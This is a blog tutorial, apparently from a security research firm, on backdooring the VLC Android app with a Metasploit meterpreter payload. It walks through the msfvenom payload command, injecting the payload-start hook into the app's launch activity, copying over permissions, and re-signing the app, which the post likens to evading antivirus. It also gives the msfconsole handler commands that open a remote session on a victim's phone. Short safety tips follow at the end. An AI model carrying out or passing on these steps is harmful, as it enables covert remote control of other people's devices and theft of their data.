The Black Hat Art of Backdooring Android APK | Part 1 | Lucideus Research

Why Android?     (Difficulty: Hard)
As you can see on left Android is world's most popular OS when it comes to smartphones and in India only, approx. 90% of people who use smartphone's are having Android running on their devices, whether its Lollipop or to Nugget version.Hence because of the popularity and fragmentation problem of Android it has become the first choice of cyber criminals to pawn. A large chunk of android users are not too much familiar with the android security, which is an another point cyber criminals are taking advantage, and via social engineering they are making users install backdoor applications  which results in device compromise. In this article we will talk about a popular method cyber criminals are using to backdoor apks.

Pre-Requisites:
Kali Linux , you can use any other OS but I prefer Kali Linux.
An Original APK , I used VLC. Download Link: VLC.

Easy APK Tool , It is basically a GUI Version of Apktool whose CLI version is included in Kali Linux.

Download Link:Easy APK Tool.
Alternate Download Link:Alternative.


Steps to Generate the Meterpreter Payload

Step 1: Generate a Payload apk using msfvenom. The Command is:
#msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o payload.apk

The Available Payloads are:
reverse_tcp
reverse_http
reverse_https
I will be using reverse_https. Simply because I found it to be more Stable.











Step 2: Setup Easy APK Tool
  • Now Install or extract the Easy APK Tool.
  • Copy the Downloaded Original apk and the Payload apk to a Folder in Easy Apk Tool folder(create a new folder). Also create a Folder named “ Frameworks ” in the Easy Apk Tool folder.



Now open Easy APK Tool.


Click on Select APK and select the Original apk (vlc.apk).



  • In the Framework option, click on Select Framework and select the Original apk.
  • Now click on Change option in the Install Directory option, and select the Frameworks folder we created earlier.  And then click on the Install FW APK button.



Step 3 : Decompiling the Original apk and Payload apk
  • After the Process is done go back to the Main Menu and uncheck all the checkboxes you see besides the big buttons except the “Force delete destination directory ” box.
  • Now click on Decompile.
  • After the decompiling is completed, Select the payload apk using the Select APK option and click on Decompile ( No need to install the framework).


Step 4: Binding Process
  • Copy the Payload files (smali files) to the Original apk folder.
  • Now open the Decompiled Payload Folder and then go to smali → com folder.
  • Now copy the metasploit folder there and paste it in ...original_apk/smali/com folder. Already there will be a folder named as “android”. Now there should be 2 folder in the com folder-android and metasploit.


Step 5: Find the Main Smali File through the AndroidManifest of the Original apk.

Now open the Original App folder and open the AndroidManifest file using any Text Editor. I prefer using Sublime Text, you can use any other if you like.

Now find an activity tag, (line 26), which has the following lines:
<action android:name="android.intent.action.MAIN"/> 

Line 28
<category android:name="android.intent.category.LAUNCHER"/>

Line 29


When you find it, copy its android:name.Then open a new file and paste it there.

Those two lines we searched for, signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the 'main' function in traditional programming.

Now this part is Interesting, Did you notice anything similar about the android:name you copied?
org.videolan.vlc.StartActivity







Notice that if you replace the dots with backslashes you will find that it is actually an address of the StartActivity.smali file

org\videolan\vlc\StartActivity

Note: It is not necessary that the smali file’s name is StartActivity.Some other app may have some other name of the smali file like MainActivity etc.

Step 6. Inject the hook into the StartActivity.smali file of the Original apk.
Now go to that address












Open the StartActivity.smali file with a Text Editor.
Now search for “ ;->onCreate(Landroid/os/Bundle;)

















When you locate it, paste the following code in the line next to it :
invoke-static {p0},
Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
























And save the File.

Step 7. Inject the permissions in the AndroidManifest.xml file
Now we have to give the App all the Permissions for the Fun Stuff, because right now it can only do things like Playing Music and Videos which is like so Boring! We want to do the Fun Stuff!

So open the AndroidManifest file from the Original apk folder and also the AndroidManifest file from the Payload folder.

Now copy all the uses-permission from the payload AndroidManifest file to the Original apk AndroidManifest file. 

















Make sure there are no Duplicates.
Save the original apk AndroidManifest File.

Step 8: Re-compile the Original apk
  • Now back to the Easy APK Tool.
  • Click on the little Brown option next to the Select APK and select the Decompiled Original APK folder.  And click on Compile.

Now after the Compiling Process is completed go to the Log output Menu and check that there was no big errors, warning are alright ignore them. There should not be an error saying “compiling failed” or something like that at the end.



Step 9. Sign and Zipalign the APK

Now for the tricky part.The compiled apk will not install in any android mobile because its signature has been removed and if you try to install, you will get an unable to parse file/apk error.


So to fix that error we need to Sign and Zipalign the apk using the Easy APK Tool, think of it like you are Evading an Antivirus.
Now the Combo that has worked so far for me after re-compiling is: sign → zipalign (as this will make a new apk select that and then ) → sign.


Step 10 : Transfer the App and Exploit

Now take the apk and host it on your Lan Server using Xampp or just transfer the apk to the Victim’s Mobile using any method. I will be using Remix OS in my VM. In your Kali Linux, Open Metasploit Framework.


To open Start Metasploit, type the following commands in terminal:
msfconsole
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_https
  • set LHOST <your ip>
  • set LPORT <your port>
  • exploit

On the Mobile Install the apk and as soon as you open it you will get a Meterpreter Session on Metasploit.

Compromised Device Information

Remark: When an user will list all the running processes, then only VLC will be listed. Whereas the metasploit payload will not be listed. Conclusion We will conclude the article by just saying the same things which you hearing from others too, that following below security measures to stay safe.
These are some countermeasures which we can use to secure your android devices:
  • Always use Google Play Store for installing Android application.
  • Never download and install any application from unknown source.
  • Always check for the permission which an application is using while installing the application in the android phone.
  • Download Unhack if you feel there is some application stealing your stuff which can be SMS or Call and so on.

Sites like apkmania and others may have inbuilt attached malware like above Hence always remember when you are getting any paid app from web , its a very high probability that cyber criminals have attached malware in it which is now a days very difficult to detect.

1 comment:

  1. Hi there,


    very interesting article loved it, I would like to ask you a question, I am using APKTOOL to work on apps, I just have a problem with one app that has a call to action for rating when you press back to leave the app, the problem is when I change the package name the app show an error instead of the rating action " unfortunately app name has stooped" any help would be very very appreciated thank you

    ReplyDelete

Powered by Blogger.